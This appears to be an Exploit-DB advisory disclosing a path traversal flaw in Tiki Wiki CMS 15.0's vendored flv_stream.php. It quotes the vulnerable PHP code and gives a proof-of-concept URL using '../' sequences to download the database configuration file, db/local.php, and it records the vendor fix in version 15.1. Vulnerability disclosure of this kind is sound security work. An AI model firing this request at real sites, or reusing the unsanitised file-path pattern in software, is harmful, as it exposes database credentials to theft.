Tiki Wiki CMS 15.0 - Arbitrary File Download

Author: Kacper Szurek
type: webapps
platform: php
port: 80.0
date_added: 2016-07-11 
date_updated: 2016-07-11 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtiki-15.0.7z

# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

Using `flv_stream.php` file from `vendor` directory we can download any file.

http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html

File: tiki-15.0\vendor\player\flv\flv_stream.php

<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');

$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);


if (file_exists($filename)) {
	header('Content-Type: video/x-flv');
	if ($position != 0) {
		echo 'FLV', pack('CCNN', 1, 1, 9, 9);
	}
	$file = fopen($filename, "rb");
	fseek($file, $position);
	while (!feof($file)) {
		echo fread($file, 16384);
	}
	fclose($file);
} else {
	echo 'The file does not exist';
}
?>

2. Proof of Concept

Example for downloading database configuration:

http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0

3. Solution:

Update to version 15.1

Timeline:

    01-06-2016: Discovered
    01-06-2016: Vendor notified
    08-06-2016: Version 15.1 released, issue resolved